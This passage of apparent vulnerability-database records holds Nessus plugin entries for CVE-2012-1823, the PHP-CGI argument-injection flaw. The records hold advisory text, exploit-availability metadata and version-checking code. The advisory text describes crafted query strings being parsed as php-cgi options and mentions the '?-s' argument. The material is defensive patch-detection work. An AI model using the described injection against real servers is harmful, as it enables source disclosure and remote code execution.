CVE link in the References section.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Server.\n\nA flaw was found in the way the php-cgi executable processed command\nline arguments when running in CGI mode. A remote attacker could send\na specially crafted request to a PHP script that would result in the\nquery string being parsed by php-cgi as command line options and\narguments. This could lead to the disclosure of the script", "modified": "2020-03-02T00:00:00", "id": "CENTOS_RHSA-2012-0547.NASL", "href": "https://www.tenable.com/plugins/nessus/59058", "published": "2012-05-10T00:00:00", "title": "CentOS 5 : php53 (CESA-2012:0547)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0547 and \n# CentOS Errata and Security Advisory 2012:0547 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(59058);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2020/01/07\");\n\n script_cve_id(\"CVE-2012-1823\");\n script_bugtraq_id(53388);\n script_xref(name:\"RHSA\", value:\"2012:0547\");\n\n script_name(english:\"CentOS 5 : php53 (CESA-2012:0547)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated php53 packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Server.\n\nA flaw was found in the way the php-cgi executable processed command\nline arguments when running in CGI mode. A remote attacker could send\na specially crafted request to a PHP script that would result in the\nquery string being parsed by php-cgi as command line options and\narguments. This could lead to the disclosure of the script's source\ncode or arbitrary code execution with the privileges of the PHP\ninterpreter. (CVE-2012-1823)\n\nRed Hat is aware that a public exploit for this issue is available\nthat allows remote code execution in affected PHP CGI configurations.\nThis flaw does not affect the default configuration using the PHP\nmodule for Apache httpd to handle PHP scripts.\n\nAll php53 users should upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. After installing the\nupdated packages, the httpd daemon must be restarted for the update to\ntake effect.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2012-May/018617.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ada2dd15\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected php53 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-1823\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP CGI Argument Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php53\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php53-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php53-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php53-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php53-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php53-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php53-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php53-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php53-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php53-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php53-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php53-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php53-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php53-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php53-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php53-process\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php53-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php53-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php53-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php53-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php53-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/05/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/10\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 5.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"php53-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php53-bcmath-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php53-cli-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php53-common-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php53-dba-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php53-devel-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php53-gd-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php53-imap-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php53-intl-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php53-ldap-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php53-mbstring-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php53-mysql-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php53-odbc-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php53-pdo-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php53-pgsql-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php53-process-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php53-pspell-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php53-snmp-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php53-soap-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php53-xml-5.3.3-7.el5_8\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"php53-xmlrpc-5.3.3-7.el5_8\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php53 / php53-bcmath / php53-cli / php53-common / php53-dba / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-17T22:46:52", "bulletinFamily": "scanner", "description": "A flaw was found in the way the php-cgi executable processed command\nline arguments when running in CGI mode. A remote attacker could send\na specially crafted request to a PHP script that would result in the\nquery string being parsed by php-cgi as command line options and\narguments. This could lead to the disclosure of the script", "modified": "2020-03-02T00:00:00", "id": "ALA_ALAS-2012-77.NASL", "href": "https://www.tenable.com/plugins/nessus/69684", "published": "2013-09-04T00:00:00", "title": "Amazon Linux AMI : php (ALAS-2012-77)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2012-77.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(69684);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/10/16 10:34:21\");\n\n script_cve_id(\"CVE-2012-1823\");\n script_xref(name:\"ALAS\", value:\"2012-77\");\n script_xref(name:\"RHSA\", value:\"2012:0546\");\n\n script_name(english:\"Amazon Linux AMI : php (ALAS-2012-77)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A flaw was found in the way the php-cgi executable processed command\nline arguments when running in CGI mode. A remote attacker could send\na specially crafted request to a PHP script that would result in the\nquery string being parsed by php-cgi as command line options and\narguments. This could lead to the disclosure of the script's source\ncode or arbitrary code execution with the privileges of the PHP\ninterpreter. (CVE-2012-1823)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2012-77.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update php' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP CGI Argument Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-mssql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-mysqlnd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-process\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/05/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"php-5.3.13-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-bcmath-5.3.13-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-cli-5.3.13-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-common-5.3.13-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-dba-5.3.13-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-debuginfo-5.3.13-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-devel-5.3.13-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-embedded-5.3.13-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-fpm-5.3.13-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-gd-5.3.13-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-imap-5.3.13-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-intl-5.3.13-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-ldap-5.3.13-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-mbstring-5.3.13-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-mcrypt-5.3.13-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-mssql-5.3.13-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-mysql-5.3.13-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-mysqlnd-5.3.13-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-odbc-5.3.13-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-pdo-5.3.13-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-pgsql-5.3.13-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-process-5.3.13-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-pspell-5.3.13-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-recode-5.3.13-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-snmp-5.3.13-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-soap-5.3.13-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-tidy-5.3.13-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-xml-5.3.13-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php-xmlrpc-5.3.13-1.20.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-bcmath / php-cli / php-common / php-dba / php-debuginfo / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-18T00:12:20", "bulletinFamily": "scanner", "description": "php development team reports :\n\nSecurity Enhancements and Fixes in PHP 5.3.12 :\n\n- Initial fix for cgi-bin ?-s cmdarg parse issue (CVE-2012-1823)", "modified": "2020-03-02T00:00:00", "id": "FREEBSD_PKG_60DE13D595F011E1806A001143CD36D8.NASL", "href": "https://www.tenable.com/plugins/nessus/59009", "published": "2012-05-07T00:00:00", "title": "FreeBSD : php -- vulnerability in certain CGI-based setups (60de13d5-95f0-11e1-806a-001143cd36d8)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2019 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(59009);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/10/16 10:34:21\");\n\n script_cve_id(\"CVE-2012-1823\");\n\n script_name(english:\"FreeBSD : php -- vulnerability in certain CGI-based setups (60de13d5-95f0-11e1-806a-001143cd36d8)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"php development team reports :\n\nSecurity Enhancements and Fixes in PHP 5.3.12 :\n\n- Initial fix for cgi-bin ?-s cmdarg parse issue (CVE-2012-1823)\"\n );\n # https://vuxml.freebsd.org/freebsd/60de13d5-95f0-11e1-806a-001143cd36d8.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?eb7663e5\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP CGI Argument Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php52\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php53\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/05/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"php5>5.4<5.4.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php5<5.3.12\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php53<5.3.12\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php4<4.4.10\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php52<5.2.17_8\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-18T02:22:28", "bulletinFamily": "scanner", "description": "Updated php packages that fix one security issue are now available for\nRed Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Server.\n\nA flaw was found in the way the php-cgi executable processed command\nline arguments when running in CGI mode. A remote attacker could send\na specially crafted request to a PHP script that would result in the\nquery string being parsed by php-cgi as command line options and\narguments. This could lead to the disclosure of the script", "modified": "2020-03-02T00:00:00", "id": "REDHAT-RHSA-2012-0546.NASL", "href": "https://www.tenable.com/plugins/nessus/59030", "published": "2012-05-08T00:00:00", "title": "RHEL 5 / 6 : php (RHSA-2012:0546)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0546. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(59030);\n script_version (\"1.26\");\n script_cvs_date(\"Date: 2019/10/24 15:35:35\");\n\n script_cve_id(\"CVE-2012-1823\");\n script_bugtraq_id(53388);\n script_xref(name:\"RHSA\", value:\"2012:0546\");\n\n script_name(english:\"RHEL 5 / 6 : php (RHSA-2012:0546)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated php packages that fix one security issue are now available for\nRed Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Server.\n\nA flaw was found in the way the php-cgi executable processed command\nline arguments when running in CGI mode. A remote attacker could send\na specially crafted request to a PHP script that would result in the\nquery string being parsed by php-cgi as command line options and\narguments. This could lead to the disclosure of the script's source\ncode or arbitrary code execution with the privileges of the PHP\ninterpreter. (CVE-2012-1823)\n\nRed Hat is aware that a public exploit for this issue is available\nthat allows remote code execution in affected PHP CGI configurations.\nThis flaw does not affect the default configuration in Red Hat\nEnterprise Linux 5 and 6 using the PHP module for Apache httpd to\nhandle PHP scripts.\n\nAll php users should upgrade to these updated packages, which contain\na backported patch to resolve this issue. After installing the updated\npackages, the httpd daemon must be restarted for the update to take\neffect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2012:0546\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-1823\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n 